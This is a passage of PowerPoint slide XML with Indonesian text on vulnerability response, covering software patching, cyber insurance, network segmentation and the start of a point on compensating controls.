              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (router, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan firewall), basis data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Asuransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asuransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asuransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Asuransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertanggungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen-segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lateral </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kompensasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
